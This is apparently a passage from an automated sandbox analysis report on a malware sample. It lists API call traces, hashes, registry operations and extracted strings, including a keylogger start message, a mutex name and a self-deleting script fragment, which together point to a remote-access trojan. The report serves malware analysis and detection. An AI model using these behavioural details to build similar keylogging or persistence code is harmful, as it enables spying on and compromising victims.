                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                          • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID: pQG
                                                          • API String ID: 1958988193-3769108836
                                                          • Opcode ID: 0f98f6b2fa3e8daa10c794e4e90518561bdac5fa53dda9530c93ee6adae91d98
                                                          • Instruction ID: 007c54a35b5ab6fada7f5b2b4f31fda992404cc28ee9ac254c5285dcec39f6dc
                                                          • Opcode Fuzzy Hash: 0f98f6b2fa3e8daa10c794e4e90518561bdac5fa53dda9530c93ee6adae91d98
                                                          • Instruction Fuzzy Hash: 0911E730640B406AE720E724D88972F7B9AAB81316F44047EF18566AE3CA799CD5C29D
                                                          Function 004127AA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1417 4127aa-4127c1 RegCreateKeyA 1418 4127c3-4127f8 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1417->1418 1419 4127fa 1417->1419 1421 4127fc-412808 call 401eea 1418->1421 1419->1421
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004127B9
                                                          • RegSetValueExA.KERNEL32(?,XwF,00000000,?,00000000,00000000,00475308,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127E1
                                                          • RegCloseKey.KERNEL32(?,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: XwF$pth_unenc
                                                          • API String ID: 1818849710-1649331827
                                                          • Opcode ID: a33492682faf8f4a7bd2e45a582a8398943db92faccb4fb8927a7d9da3d413cc
                                                          • Instruction ID: b42ea712bc7a6ff48bd64609183fdbccf638e423d93a2202917fd6756948167f
                                                          • Opcode Fuzzy Hash: a33492682faf8f4a7bd2e45a582a8398943db92faccb4fb8927a7d9da3d413cc
                                                          • Instruction Fuzzy Hash: 27F06D32140204BBCB00AFA1DD45AEF3768EF00751B108169B916B60A1EE759E04EBA4
                                                          Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: 413225cce52aee32b715eff5e13c65a485cf973104212bdc3a05f84c9635596c
                                                          • Instruction ID: 15e43fcc554e39227c644a0273f32637653ac1eeca6ef832bd6c9a92d0497390
                                                          • Opcode Fuzzy Hash: 413225cce52aee32b715eff5e13c65a485cf973104212bdc3a05f84c9635596c
                                                          • Instruction Fuzzy Hash: 0A1198B15003097AD224BA36CC86DBF7A5CDA813A8B40053EB845622D3EA785E14C6FB
                                                          Function 004128AD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                          • RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: TeF
                                                          • API String ID: 1818849710-331424825
                                                          • Opcode ID: 69388a3f5ca785ef31159ee28a7932d701a8b17d3c2adace4bd37096d90c6bf5
                                                          • Instruction ID: 5082c9e4fe043c0a9a82c1e0a3a4def458545ef8caf92c2e29ea1f35f3ad8a86
                                                          • Opcode Fuzzy Hash: 69388a3f5ca785ef31159ee28a7932d701a8b17d3c2adace4bd37096d90c6bf5
                                                          • Instruction Fuzzy Hash: C9E03971640308BFDF119B919C05FDB3BA8EB04B95F004165FA05F61A1DAB1DE18EBA8
                                                          Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3360349984-0
                                                          • Opcode ID: eceb8113e26336935bf5c75f2de3c1b2d8d60dab3ee53c9ce013581b5c88e7f2
                                                          • Instruction ID: 5371640f48c6a0368c7cea64887978d4ac2a240c02499e3407376e9d4191e8ff
                                                          • Opcode Fuzzy Hash: eceb8113e26336935bf5c75f2de3c1b2d8d60dab3ee53c9ce013581b5c88e7f2
                                                          • Instruction Fuzzy Hash: 10417171504301ABC700FB61CC55D7FBBE9AFD5315F00093EF892A32E2EE389909866A
                                                          Function 0041B79A Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B7F6
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B80A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041B817
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                          • String ID:
                                                          • API String ID: 3604237281-0
                                                          • Opcode ID: 801f75d00fac8da0c66411ebabb5881698d5c73b15829ac97cd3568d121a9cb6
                                                          • Instruction ID: fca0af3f27241acfb9d15a16a542bc487c24adb9e916811621f81636ea96e045
                                                          • Opcode Fuzzy Hash: 801f75d00fac8da0c66411ebabb5881698d5c73b15829ac97cd3568d121a9cb6
                                                          • Instruction Fuzzy Hash: 1501F5712052057FE6105E249CC9EBB739CEB82B75F10063EF662D23C1DB25CC8686B9
                                                          Function 00414D2D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID: NG
                                                          • API String ID: 180926312-1651712548
                                                          • Opcode ID: 2dd0ccaeec8dff5bc5cefe6a82063f4aebaa20f84b08a88131a51017049765b7
                                                          • Instruction ID: 085b2f02be9ab0868ba51c73fb921716b1faa5b055701b3286f453889ed4f7a0
                                                          • Opcode Fuzzy Hash: 2dd0ccaeec8dff5bc5cefe6a82063f4aebaa20f84b08a88131a51017049765b7
                                                          • Instruction Fuzzy Hash: C85182321042409AC624FB71D8A2AEF73E5AFD0304F00453FB94A671E2EF789949C69E
                                                          Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040DA7D,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046656C,00000003,00000000), ref: 0040BEE6
                                                          • GetLastError.KERNEL32 ref: 0040BEF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID: Rmc-JLQBNY
                                                          • API String ID: 1925916568-1282113796
                                                          • Opcode ID: a3b1be1148cb3973ecd705bae41f9902d0fcd13797bcadbc01d9bc0dca2f87b2
                                                          • Instruction ID: 2210f0ff69d3cac9d22e7a3f14049619627ec1602d204fa864a150733b7892bf
                                                          • Opcode Fuzzy Hash: a3b1be1148cb3973ecd705bae41f9902d0fcd13797bcadbc01d9bc0dca2f87b2
                                                          • Instruction Fuzzy Hash: B9D012702057009BE70817709D4E76D3951D784703F00407DB90BE51E1CEA488409519
                                                          Function 004125EB Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                          • RegCloseKey.KERNEL32(?), ref: 00412637
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 3cd3d7d3008c69d15b158efa000f5de0851c37b6ec12a2d5daac047773a23bf0
                                                          • Instruction ID: 14faf112d3046a25d46051106a5b1d66d342437105d793e51b0bcc882fecfd0c
                                                          • Opcode Fuzzy Hash: 3cd3d7d3008c69d15b158efa000f5de0851c37b6ec12a2d5daac047773a23bf0
                                                          • Instruction Fuzzy Hash: D8F0D176900118BBCB209B91DD09EDF7B7CEB44B50F00406ABA05F2190DA749E599BA8
                                                          Function 00412735 Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                          • RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 2290404c5028f19351fda844a65f428930317fa0cea8d3593e6495ca7ac6aa60
                                                          • Instruction ID: 218a6bf298efa18a53fa985214dbde7e418f837aa6fd6996b0f70a828ecfe766
                                                          • Opcode Fuzzy Hash: 2290404c5028f19351fda844a65f428930317fa0cea8d3593e6495ca7ac6aa60
                                                          • Instruction Fuzzy Hash: 6501AD35800229BFDF215F91DC09DDF7F38EF05760F004065BA08A20A0EB3589A9DBA4
                                                          Function 0041258F Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                          • RegCloseKey.KERNEL32(?), ref: 004125D8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: f2bc15ec1dd87dd5d2b8e96f704feec537dddf8cd8f352820b88cb246238aa27
                                                          • Instruction ID: f1b1b21d3432ee16d2560aa6e8f8b6fc3b679f7482eced78fea8614e15db81c1
                                                          • Opcode Fuzzy Hash: f2bc15ec1dd87dd5d2b8e96f704feec537dddf8cd8f352820b88cb246238aa27
                                                          • Instruction Fuzzy Hash: B4F03075A00208BFDF119FA09C45FDEBBB8EB04B55F104065FA05F6191D670DA54DB94
                                                          Function 00412546 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004670E0), ref: 0041255D
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004670E0), ref: 00412571
                                                          • RegCloseKey.KERNEL32(?,?,?,0040B996,004670E0), ref: 0041257C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 90b816baf6681459c689896bd7ee7621983de5913a9f55156db5b466bfdb1e74
                                                          • Instruction ID: da5e3a6b8615f7fc9763e362b131f946d251b316bd2acc507b7b22157b73f9fc
                                                          • Opcode Fuzzy Hash: 90b816baf6681459c689896bd7ee7621983de5913a9f55156db5b466bfdb1e74
                                                          • Instruction Fuzzy Hash: 1BE03931941224BB9B200BA29D09EDB7F6DEF06BA1B010455B809A2111DAA18E54EAF4
                                                          Function 0041AB50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041AB64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: @
                                                          • API String ID: 1890195054-2766056989
                                                          • Opcode ID: a4fe8e15525f2be1febd29730eb74c732a6063ed027868c332be47892e1af589
                                                          • Instruction ID: b665d68c061e3f9f56ba9c4249da2251c097319f67e9030db6e937b6cf7da2fa
                                                          • Opcode Fuzzy Hash: a4fe8e15525f2be1febd29730eb74c732a6063ed027868c332be47892e1af589
                                                          • Instruction Fuzzy Hash: 00D067B59013189FCB20DFA8E945A8DBBF8EB48214F004529E946E3744E774E945CB94
                                                          Function 0044BBCE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 0044BBEF
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • RtlReAllocateHeap.NTDLL(00000000,00476D58,?,00000004,00000000,?,0044EB1A,00476D58,00000004,?,00476D58,?,?,00443335,00476D58,?), ref: 0044BC2B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap$_free
                                                          • String ID:
                                                          • API String ID: 1482568997-0
                                                          • Opcode ID: c663a77da406be6e54bbe5e4694e400583292b09c8c587c623d78d47e3d5e62a
                                                          • Instruction ID: 767aa377775814b37deb1c17d78f1b9627af84273febb40deea43816b68d1426
                                                          • Opcode Fuzzy Hash: c663a77da406be6e54bbe5e4694e400583292b09c8c587c623d78d47e3d5e62a
                                                          • Instruction Fuzzy Hash: D3F0C23160051166FB212A679C81F6B2B59CF82B74B15402FF805AA691DF3CD841A1ED
                                                          Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEventStartupsocket
                                                          • String ID:
                                                          • API String ID: 1953588214-0
                                                          • Opcode ID: 9dcc25316a99288ac387cf2e613c868b0e107fead0b532e7680f1acbcbd447ec
                                                          • Instruction ID: e62a462d4859cb901c95814de100b0ae44c334504336dc08fc7633b5118be932
                                                          • Opcode Fuzzy Hash: 9dcc25316a99288ac387cf2e613c868b0e107fead0b532e7680f1acbcbd447ec
                                                          • Instruction Fuzzy Hash: 100171B0508B809FD7358F38B8456977FE0AB15314F044DAEF1D697BA1C7B5A481CB18
